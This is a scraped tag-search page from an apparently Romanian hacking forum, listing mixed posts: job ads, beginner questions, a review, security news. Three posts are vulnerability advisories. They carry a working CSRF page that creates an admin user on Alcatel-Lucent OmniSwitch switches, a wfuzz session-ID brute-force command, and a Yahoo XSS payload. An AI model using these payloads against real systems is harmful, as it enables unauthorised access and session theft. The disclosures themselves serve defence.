Jump to content

Search the Community

Showing results for tags 'web'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Cumparaturi online's Test
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 68 results

  1. Bună la toți,sunt începător dar totuși am găsit o eroare de sistem la operatorul meu de internet în protocoalele SSL au soluționat problema rapid în 24 ore,dar nici măcar cu un ms nu m-am ales,obijduitor 😒(Îmi vine să mă răzbun pe ei)
  2. Fitbit is building a new security team in Bucharest. Full details here: https://grnh.se/gmt7lrkc1 Brief description of the job: The application security team at Fitbit is responsible for overseeing the secure design and implementation of applications. We do this by: Consulting with software engineers to ensure the relevant controls are built into their work Assessing software produced by Fitbit and its partners Participating in the security community to understand new and emerging threats We try to find achieve our mission through innovative ways of collaborating with our software teams that allow them to continue to deliver at scale and ve What You’ll Work On: Conduct threat modelling exercises New security sensitive functionality (e.g. changes to authentication flows) require a security team member to be involved New application infrastructure, e.g. entirely new SOA services required a feedback from a security engineer Provide application security consulting to engineers Perform manual and automated code review Our goal is to automate us much of our role as possible Create rules to help us to identify software that should be manually reviewed by a skilled application security engineer Help enable self-service reviews for engineers Work on tooling to expedite the process of doing software reviews Perform ad-hoc application assessments Assist with Fitbit’s Bug Bounty programs Help with the replication, prioritization and filing of issues identified via our bug bounty programs Assist with Fitbit’s developer outreach efforts Share root cause analysis information with our outreach team to ensure we’re educating our engineers about common security pitfalls and how to avoid them Required Skills: Significant experience in application penetration testing and source code review Knowledge of mobile and web application architecture Ability to read and break code written in different languages, emphasis on Java Strong understanding of applied cryptography Strong understanding of web application security technologies like CORS, OAuth, JSONP and browser security concepts such as the same origin policy Experience with static and dynamic application security tools A passion for security and technology Experience in a variety of software development environments and knowledge of contemporary agile software development methodologies Experience with test-driven development and other agile practices Broad knowledge of all areas of information technology including networking, operating systems and ideally application development Strong software development skills in at least one language Aspires to develop a deep understanding of information security Experience as a system administrator or security engineer Experience with managing information security incidents Solves problems through scripting and automation Willing to learn new things Willing to look at for innovative or non-standard solutions to problems Good sense of humor Calm under pressure Good time management skills Interactions with other teams The application security team is responsible for consulting with software engineering teams about the best and safest way to implement their features. They are also responsible for reviewing the output of software engineering teams for safety. As such, strong interpersonal skills are required. This person needs to be able to diplomatically provide software engineers with advice, and to coach developers through problems that may be identified in their work. The successful applicant will be able to positively influence software engineers’ behaviour through their interactions. Nice-to-Have Skills: Have a strong development background Background in infrastructure penetration testing Experience with compliance such as PCI and/or ISO27000 Experience with exploit/proof of concept development Experience in information security consulting Experience in in-house application security teams at larger technology companies with a reputation for security engineering Had incident response experience Developed tooling to automate information security tasks Have a wide knowledge from diverse parts of IT Worked on open source security projects
  3. Hi all, there is a website that I found where you can practice your website hacking skills. There are 50 vulnerabilities to be found, this website goes along with the courses from my previous course where I provide a URL with a plethora of courses The URL of this website: http://hackyourselffirst.troyhunt.com/ Good luck.
  4. Am nevoie de cineva sa imi faca un anumit script in iMacros!este o treaba foarte usoara citirea unor date de pe un site si anumite operatii pe el site lucru cu butoane si date , lucru de cateva ore, daca cineva este interesant pm me !platesc
  5. Salut, puteti sa imi recomandati un player web pentru wordpress care sa preia link-urile de pe youtube si sa le redea unul dupa altul... sa semene ca un fel de televiziune live daca intelegeti ce vreau sa spun... Stiu ca se poate face playlist in youtube si incorpora link-ul, dar nu vreau ca omul sa aiba posibilitatea sa aleaga ce vrea el si sa se plimbe prin continut. Pentru orice alte detalii pe care le doriti, intrebati-ma. Multumesc anticipat!
  6. salut, doresc un site de prezentare identic cu modelul gasit de mine,detaliile le voi trimite in privat.
  7. Buna ziua am si eu o mica problema Am facut un site de anunturi si mar interesa treaba cu seo cand spun seo la ce ma refer, ma intereseaza ca clienti mei cand publica un anunt sa apara pe google , la inceput chiar daca dureaza cateva zile mie indiferent dar sa apara pe prima pagina de google cum asi putea face asa ceva ce fisiere ,trebuie sa modific ?. Trebuie sa le modific la cateva zile Keywords titulu de la pagina esplicatimi folosesc plataforma open www.open-classifieds.com plugin nu poti sa instalez nici nimica asa ca datimi o solutie Ma intereseaza ca Anunturile publicate sa apara pe google intre pagina unu doi sau 3 (acuma va intreb ca nu inteleg ) daca a aparut pe a 5 pagina cum fac sa le aduc pe prima pagina multumesc mult Nu prea am scris gramatical.. adimit ajja nu vreu sa stau sa ascult parerea alcuiva care nu este despre ce am cerut ajutor MULTUMESC MULT
  8. Buna seara ! Am nevoie de ajutor, sa-mi dati un nume de site .ro Situl va fi cu tot felul deci nu il pot pune intr-o categorie anume. Paste sa fie si cuvant inventat. Ce ma intereseaza in specialeste sa aiba putine rezultate in Google sau 0. :-/:-/:-/:-/
  9. Summary: If you are looking for a web conferencing solution that is simple enough to use but complex enough to cope with commercial or educational web conferences (whether they are webinars, training sessions, live seminars, etc.) that is easy to use, accessible and affordable, have a look at a hidden, highly-underrated gem from Adobe: Adobe Connect (AC). Having dozens, perhaps hundreds of competitors, Adobe Connect (AC) stands out through its details that give the solution a flavour hard to resist. Context: Have been using Adobe Connect for a variety of purposes (teaching, learning, commercial, meetings) since 2012 when I carried out a little bit of research to see what solution would tick all (or most of) the boxes for my job at the time. Currently working and using it in an educational setting. Not employed nor paid/incentivized by Adobe. Description: AC is a web conferencing platform hosted by Adobe (with options for internal deployment for institutions) which allows users to participate in an online meeting without installing anything on local machines. It simply requires Flash Player (which most computers already have) or a free mobile app for tables and mobile phones. To join a meeting, a user can simply click on the invitation link, type their name and join. For those with poor internet connection, AC has an additional option of audio telephony (at extra cost) where the user can dial a landline number or a toll-free 0800 number and use that instead of the PC headset for listening and communicating. The platform is extremely flexible and caters for most needs and scenarios of usage. Whether one wishes to use AC for discussion, collaboration, separate classrooms, desktop sharing and remote control, presentation with Q&A, webinar, etc. they can do so by selecting from the menu what they want to use it for. All such meetings can be recorded and made available to specific users or public straight after the recording has finished. There is also a small editor for such recordings and hosts can edit out the recordings before releasing them. The main platform is very powerful customisation-wise: users can drag and move the interaction blocks (pods) and also new customised pods can be added freely (some are premium, paid). For example if one has a Flash application (game, countdown timer, etc.) they can add it to the platform. In the past I have used such Flash applications to embed YouTube video within it, add visitors lounge with countdown timer for next session and background music (while waiting), messages, voting apps, etc. Furthermore, participants can have a complete experience whilst using Adobe Connect. If there is a need for a teaching environment, a whiteboard facility is available and the presenter can make available for students files to download, PowerPoint with annotations, other notes, polls, live chat. If there is a formal meeting environment needed, participants can use a live interactive agenda, notes, webcams, etc. The whole experience from access to netiquette is taken care of. Finally, content can be uploaded and set-up in advance so that when the presenter (or guest speaker) joins, everything is ready to run. This saves the last-minute problems and delays and gives the opportunity for presenters to prepare in a timely fashion and test everything before the live event. In my current workplace, Adobe Connect is being used by Human Resources department for interviewing remote candidates unable to be here physically, it is being used to deliver online postgraduate courses and it also supports and facilitates blended learning programmes. We are using the on-cloud solution, hosted with Adobe. At the moment, as a negative point, it seems that their servers are quite overloaded and there hasn’t been much investment recently towards a) infrastructure and codecs and audio processing so that sound is as clear as some of the other competitors (Google, Skype, etc.) Also, on the same negative note, the maximum video resolution supported is 480p. It is understandable to have limits on video (for bandwidth and quality) for large groups of participants but on a small number of participants it would be good to have a higher resolution for video, given the current market trends. If one were to deploy the hosted version of Adobe Connect, they can adjust and with some hard work “hack” some parts of the product to improve call and video quality. However, the pricing for hosted solutions is quite prohibitive and its maintenance may become a burden in the long run. However, what makes Adobe Connect so attractive and better than its competitors? (The likes of Google, Skype, WebEx, Lync, Blackboard Collaborate, etc.) It’s pricing of about £27.50/month/license (based on annual subscription) or £600 for 5 licenses per year, excluding set-up fees, audio telephony (if applicable) and VAT. Users don’t need to install anything to join. Simply click on the URL and join Meetings can be recorded and made available Flexible layouts, small features and functionality that helps any host run smooth meetings Free mobile app versions which allows users to attend meetings on the go 24/7/365 support via phone, live chat or email in multiple languages Overall good value for money for an easy to use system that delivers. Verdict: A web conferencing platform that can be used in a variety of ways to facilitate communication, learning and collaborative work. It bridges certain gaps and their support is fantastic. They do need some investment in audio and video quality and perhaps more customer interaction with a clear and good marketing strategy in providing roadmap, truly listening to feedback and engaging users but overall, it is an excellent solution for a low-budget good-quality web conference set-up. 8.5/10
  10. Hi, Do you guys know good web security companies in Romania or surroundings? If so, please provide me their websites. Thank you
  11. Microsoft product manager Duane Forrester says it will encrypt all Bing search traffic later this year. Forrester says the move follows Cupertino's 2014 decision to allow users to opt-in to HTTPS for web searches. "Beginning this (Northern hemisphere) summer, we will begin the process of encrypting search traffic by default," Forrester blogged. "This means that traffic originating from Bing will increasingly come from https as opposed to http." Microsoft will also drop query search terms from referrers strings in a bid to further shore up privacy. Web ad bods will be able to learn the queries that lead users to their pages through Microsoft's search terms report, universal event tracking, and webmaster tools. " While this change may impact marketers and webmasters, we believe that providing a more secure search experience for our users is important," Forrester says. The HTTPS move brings Microsoft up to speed with Google which began encrypting search traffic in 2011 making it compulsory in 2013, and Yahoo! which deployed HTTPS for its search in 2014. Encrypting search traffic and other non-sensitive web traffic is seen widely by privacy and security pundits as necessary to a more safer web. Source
  12. Video training : 7Kali.part1.rar (101,00 MB) - uploaded.net 7Kali.part2.rar (101,00 MB) - uploaded.net 7Kali.part3.rar (101,00 MB) - uploaded.net 7Kali.part4.rar (101,00 MB) - uploaded.net 7Kali.part5.rar (63,75 MB) - uploaded.net Have Funk!
  13. OkayFreedom VPN. A simple VPN service enabling private, uncensored web surfing. Access websites blocked in your country Use all of your favorite websites when abroad Access the web securely – even in public hotspots Surf the Net anonymously Protect your privacy on the internet OkayFreedom VPN Premium (100% Discount)
  14. Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, 6860 Affected Versions: All Releases: AOS 6.4.5.R02 AOS 6.4.6.R01 AOS 6.6.4.R01 AOS 6.6.5.R02 AOS 7.3.2.R01 AOS 7.3.3.R01 AOS 7.3.4.R01 AOS 8.1.1.R01 Fixed Versions: - Vulnerability Type: Cross-site request forgery Security Risk: medium Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004 Advisory Status: published CVE: CVE-2015-2805 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805 Introduction ============ "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage) More Details ============ The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. The web interface allows creating new user accounts, in this case an HTTP request like the following is sent to the switch: POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1 Host: 192.0.2.1 [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 214 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:244.T1:O1=secret &EmWeb_ns:mip:246.T1:O2=-1 &EmWeb_ns:mip:248.T1:O3= &EmWeb_ns:mip:249.T1:O4=1 &EmWeb_ns:mip:250.T1:O5=4 This request creates a user "attacker" with the password "secret". All other parameters are static. All POST parameters can be predicted by attackers This means that requests of this form can be prepared by attackers and sent from any web page the user visits in the same browser. If the user is authenticated to the switch, a valid session cookie is included in the request automatically, and the action is performed. In order to activate the new user for the web interface it is necessary to enable the respective access privileges in the user's profile. This can also be done via the web interface. Then the HTTP POST request looks like the following: POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1 Host: 192.0.2.1 [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 167 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:4.T1:O1= &EmWeb_ns:mip:5.T1:O2= &EmWeb_ns:mip:6.T1:O3=4294967295 &EmWeb_ns:mip:7.T1:O4=4294967295 This request sets all access privileges for the user "attacker" and is again completely predictable. Proof of Concept ================ Visiting the following HTML page will create a new user via the switch's management web interface, if the user is authenticated at the switch: ------------------------------------------------------------------------ <html> <head> <title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title> </head> <body> <form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> ------------------------------------------------------------------------ Workaround ========== Disable the web interface by executing the following commands: AOS6: no ip service http no ip service secure-http AOS 7/8: ip service http admin-state disable If this is not possible, use a dedicated browser or browser profile for managing the switch via the web interface. Fix === Upgrade the firmware to a fixed version, according to the vendor the fixed versions will be available at the end of July 2015. Security Risk ============= If attackers trick a logged-in administrator to visit an attacker-controlled web page, the attacker can perform actions and reconfigure the switch. In this situation an attacker can create an additional user account on the switch for future access. While a successful attack results in full access to the switch, the attack is hard to exploit because attackers need to know the IP address of the switch and get an administrative user to access an attacker-controlled web page. The vulnerability is therefore rated as a medium risk. Timeline ======== 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released RedTeam Pentesting GmbH Source
  15. Advisory: Alcatel-Lucent OmniSwitch Web Interface Weak Session ID During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. This interface uses easily guessable session IDs, which allows attackers to authenticate as a currently logged-in user and perform administrative tasks. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855 Affected Versions: AOS 6.4.5.R02 AOS 6.4.6.R01 AOS 6.6.4.R01 AOS 6.6.5.R02 Fixed Versions: AOS 6.6.5.80.R02 AOS 6.6.4.309.R01 Vulnerability Type: Session Management - low identifier entropy Security Risk: high Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-003 Advisory Status: published CVE: CVE-2015-2804 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2804 Introduction ============ "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage) More Details ============ The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. A switch with the example IP 192.0.2.1 is accessible via the following URL: http://192.0.2.1/ A client is then redirected to the following URL: http://192.0.2.1/web/content/index.html For unauthenticated users the URL displays a login form and sets a session cookie with a session ID. A request to the URL with the command line HTTP client cURL shows the Set-Cookie header: $ curl -I http://192.0.2.1/web/content/index.html HTTP/1.1 200 OK Date: Tue, 17 Mar 2015 08:25:42 GMT Server: Agranat-EmWeb/R5_2_4 [...] Set-Cookie: session=sess_11012;PATH=/ The session cookie has the name "session" and its value begins with the string "sess_". By repeatedly requesting the URL with cURL it became obvious that the suffix is always a number between 1 and 32,000. This suggests that there are only about 32,000 possible session IDs, resulting in only 15 bits of entropy. Our tests showed that it was possible to get a throughput of about 50 HTTP requests per second, this means that in order to try every possible session ID an attacker will need at most 11 minutes. On average, the time it takes to find a valid session ID for an active user is even lower. Proof of Concept ================ For an attacker it is very easy to distinguish between a valid and an invalid session ID by looking at the HTTP response size. During our tests, requesting an invalid session ID always returned the login form, which was 3027 bytes in length. With a valid session ID, the management web interface is returned by the webserver and the response is larger. A number of requests in the range of the possible session cookies can be easily executed using wfuzz [0]: ------------------------------------------------------------------------ ./wfuzz.py -z range,1-32000 --hl 3027 -H "Cookie: session=sess_FUZZ" http://192.0.2.1/web/content/index.html ------------------------------------------------------------------------ Workaround ========== Administrators should avoid using the management web interface and use the serial console or administrate the switch over SSH instead. The web interface can be disabled by executing the following commands: no ip service http no ip service secure-http If the web interface is needed, it must be ensured that only authorised persons are able to even connect to the web server. In addition, the HTTP session timeout can be lowered to one minute with the following command: session timeout http 1 Fix === Upgrade the firmware to a fixed version. Security Risk ============= The vulnerability poses a high risk. An attacker can easily authenticate to a switch with the privileges of another user who is currently logged in. The attack is simple and fast. The only precondition is that a user is already using the switch during the attack. Attackers might actively trick administrators into logging in by social engineering. Timeline ======== 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released References ========== [0] https://github.com/xmendez/wfuzz RedTeam Pentesting GmbH Source
  16. Vand trafic web worldwide / Romania ( nu am foarte mult ) 10.000k /zi 50 euro luna
  17. Numele meu este Bogdan, Printre pasiunile mele se afla si programarea WEB + Desing. Sper ca am ajuns bine unde am ajuns ... Multumesc !
  18. WHEN ROSS ULBRICHT was sentenced to life in prison without parole last Friday, the judge in his case made clear that her severe punishment wasn’t only about Ulbricht’s personal actions in creating the Silk Road’s billion-dollar drug market. As Judge Katherine Forrest told the packed courtroom, she was also sending a message to any would-be online drug kingpins who might follow in his footsteps. “For those considering stepping into your shoes,” she said, “they need to understand without equivocation that there will be severe consequences.” But despite Ulbricht’s ultimate punishment, the lesson for anyone closely watching the Dark Web drug trade has hardly been one of inevitable consequences. As independent researcher Gwern Branwen has documented in an ongoing survey of more than 70 Dark Web drug markets created after Ulbricht founded the Silk Road, only five of those sites’ administrators have been arrested. For many of the others, the security model Ulbricht pioneered—using Tor and bitcoin to protect administrators, buyers and sellers—has successfully kept law enforcement fumbling in the shadows. In fact, the difficulty of laying hands on Dark Web drug market creators was one reason Ulbricht’s prosecutors asked for a lengthy sentence. If law enforcement can’t apprehend all Ulbricht imitators, went prosecutors’ argument, it had better compensate with harsher punishment for those it does catch. “Although the Government has achieved some successes in combating these successor dark markets, they continue to pose investigative challenges for law enforcement,” read the prosecution’s letter. “To the extent that would-be imitators may view the risk of being caught to be low, many are still likely to be deterred if the stakes are sufficiently high.” When Ross Ulbricht begins his life sentence at a federal prison in the coming weeks, in other words, he won’t just be serving his own time. He’ll also be serving the time of all the Dark Web drug lords who escaped his fate. Here are five of those online narco-kingpins who—for now—remain at large. Variety Jones Despite Ulbricht’s arrest and the rounding up of four of his Silk Road lieutenants, the second most important figure in that black market operation still hasn’t been captured or even publicly identified. Variety Jones served as Ulbricht’s security consultant, advisor, and even mentor, according to Ulbricht’s journal and chat logs the prosecutors admitted into evidence at trial. The anonymous figure, who sold cannabis seeds on the site, also secretly advised Ulbricht on everything from tracking sales statistics to creating a personal cover story. It was Jones who named him the Dread Pirate Roberts to give the impression of a rotating command rather than a single individual. And Jones also nudged the Dread Pirate Roberts toward violence, suggesting in a private chat that they murder an employee believed to have stolen hundreds of thousands of dollars in bitcoin from the site. Atlantis During the Silk Road’s time online, its most aggressive competition came from a site called Atlantis, a Dark Web market with a similar business model, but with the addition of an advertising budget. Atlantis went so far as to post a public YouTube video ad and to host an “ask-me-anything” session on Reddit with the site’s unnamed founder and its CEO. In an encrypted interview, those leaders would later describe their site to me as the “Facebook to [silk Road’s] Myspace.” Just before the FBI bust of the Silk Road in the summer of 2013, however, Atlantis’ founders shuttered their site and absconded with all their users’ bitcoins. Ross Ulbricht would write in his journal that the Atlantis admins had privately warned him of a purported security flaw in Tor that inspired them to abandon ship. The Atlantis creators never resurfaced—neither online nor in the hands of law enforcement. Dread Pirate Roberts 2 Just one month after the original Silk Road was seized, Silk Road 2 came online. At its helm, of course, was a new Dread Pirate Roberts; Ulbricht’s cover story of a rotating command had become a self-fulfilling prophesy. The second DPR was at least as talkative as the first, posting political statements to the Silk Road 2 forums and even creating a twitter account. But after three Silk Road 2 administrators were arrested—all of whom had worked for the original Dread Pirate Roberts on Silk Road 1.0—the new Dread Pirate Roberts gave up control of the site to a new administrator named Defcon. Defcon would be identified as 26-year-old Blake Benthal and arrested as part of Operation Onymous, a mass purge of Dark Web sites by the FBI and Europol late last year that took down dozens of Tor hidden services. But the second Dread Pirate Roberts seemed to escape that international dragnet. Verto For a year starting in March of 2014, Evolution was the new and improved mecca of the Dark Web’s underground economy. At its peak, Evolution had more than twice as many product listings as the Silk Road ever offered, including types of contraband Ulbricht never allowed on the Silk Road such as stolen financial information. And it somehow ran faster and stayed online far more reliably than its competitors. That criminal professionalism was in part the work of an experienced cybercriminal called Verto, Evolution’s pseudonymous founder and the founder of the earlier Dark Web black market known as Tor Carder Forum, devoted to identity theft. Then in March of this year, Verto and Evolution co-founder Kimble abruptly shut down the site, taking with them millions of dollars of their users’ bitcoins. A Department of Homeland Security investigation continues to search for the two Evolution administrators, revealed a subpoena sent to the “darknetmarkets” forum of Reddit seeking to identify Evolution staffers. But no arrests have been announced. Darkside For any Dark Web drug lord trying to avoid being the next Ross Ulbricht, step one is not to be in the United States. That’s a lesson from Darkside, the creator of RAMP, the Russian Anonymous Marketplace. RAMP has survived three years online—longer than any other Dark Web drug market—by focusing exclusively on Russian clientele. “We never mess with the CIA, we work only for Russians and this keeps us safe,” Darkside told WIRED in December of last year. “You can’t rape the whole world and remain safe.” Darkside, who uses an illustration of Edward Norton as his online avatar, said at the time of that interview that RAMP was continuing to earn him close to $250,000 a year in revenue, far less than the Silk Road but enough for Darkside to consider himself a “rich guy” in his local currency. And he offered another tip to avoid the kind of law enforcement crackdown that targeted the Dread Pirate Roberts: don’t talk politics. In fact, all political discussion is banned on RAMP. “Politics always attract extra attention,” Darkside wrote. “We do not want that.” Source
  19. Location: University of Warwick, Coventry Vacancy: Web Developer Department: Warwick Business School Salary: £38,511 - £45,954 per annum Full Stack Web Developer wanted to join small, high performing team developing a mature e-learning infrastructure. Also producing public-facing marketing sites and administrative Web applications in support of teaching and operational excellence. You will be passionate about the user experience and be knowledgeable about Web standards and best practice. You will have experience of creating intuitive, modern and aesthetically pleasing sites from scratch which you will need to show us as part of your application. We value the ability to rapidly learn and adapt to new technologies above current skills and abilities although, as a guide, we are looking for skills in HTML, CSS, Javascript, Bootstrap and JQuery alongside back-end technologies including Java, SQL and NoSQL datastores. It is essential that you can demonstrate experience of the full development lifecycle, from working alongside clients to establish requirements, through specification, project management and implementation to the testing, QA and acceptance of the finished product. Details and online application - https://goo.gl/8xPQra
  20. Dear members, First of all, apologies if this is posted in the wrong section We are urgently looking for highly professional web security analysts who wish to work by contract in our security company. You need to have a comprehensive knowledge in researching exploitation of web security (eg. php, java etc). If you wish to apply to this project, please provide us your CV. Also companies can apply if they have staff who can work with us locally. Regards, M.
  21. Document Title: =============== Yahoo eMarketing Bug Bounty #31 - Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1491 Yahoo Security ID (H1): #55395 Release Date: ============= 2015-05-07 Vulnerability Laboratory ID (VL-ID): ==================================== 1491 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a billion consumers every month in more than 30 languages. (Copy of the Vendor Homepage: http://www.yahoo.com ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a client-side cross site scripting web vulnerability in the official Yahoo eMarketing online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-03: Vendor Notification (Yahoo Security Team - Bug Bounty Program) 2015-05-05: Vendor Response/Feedback (Yahoo Security Team - Bug Bounty Program) 2015-05-06: Vendor Fix/Patch (Yahoo Developer Team) 2015-05-06: Bug Bounty Reward (Yahoo Security Team - Bug Bounty Program) 2015-05-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non-persistent input validation web vulnerability has been discovered in the official Yahoo eMarketing online service web-application. The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise user/admin session information. The vulnerability is located in the `id` value of the `eMarketing` module. Remote attackers are able to inject malicious script codes to client-side GET method application requests. Remote attackers are able to prepare special crafted web-links to execute client-side script code that compromises the yahoo user/admin session data. The execution of the script code occurs in same module context location by a mouse-over. The attack vector of the vulnerability is located on the client-side of the online service and the request method to inject or execute the code is GET. The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation. Request Method(s): [+] GET Vulnerable Module(s): [+] Yahoo > eMarketing Vulnerable Parameter(s): [+] id Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click). For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC Payload(s): "onmouseenter="confirm(document.domain) (https://marketing.tw.campaign.yahoo.net/) PoC: eMarketing ID <br/> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td align="right" width="10%" > <div class="fb-like" style="overflow: hidden; " data-href="http://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id="onmouseenter="confirm(document.domain)" data-layout="button_count" data-action="recommend" data-show-faces="false" data-share="true"></div> </td> <td align="left" valign="bottom" width="65%" > <span style="font-size:12px; margin: 2px; font-weight:bold; color:#4d0079">?????????? ????????</span> </td> </tr> </table> --- PoC Session Logs [GET] --- Status: 200[OK] GET https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id=%22onmouseenter=%22confirm(document.domain) Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html] Request Headers: Host[marketing.tw.campaign.yahoo.net] User-Agent[Mozilla/5.0 (X11; Linux i686; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] Cookie[_ga=GA1.5.1632823259.1428499428; s_pers=%20s_fid%3D66FF8BBF1D4DB480-10779CBEBDA57A64%7C1491837590956%3B%20s_vs%3D1%7C1428680990957%3B%20s_nr%3D1428679190961-New%7C1460215190961%3B; __qca=P0-870655898-1430085821750; _ga=GA1.2.1969841862.1430892005] X-Forwarded-For[8.8.8.8] Connection[keep-alive] Response Headers: Date[Wed, 06 May 2015 12:19:05 GMT] Server[ATS] X-Powered-By[PHP/5.3.27] Content-Type[text/html] Age[0] Connection[close] Via[http/1.1 leonpc (ApacheTrafficServer/4.2.0 [c sSf ])] Reference(s): https://marketing.tw.campaign.yahoo.net https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/ https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id= Solution - Fix & Patch: ======================= The vulnerability can be 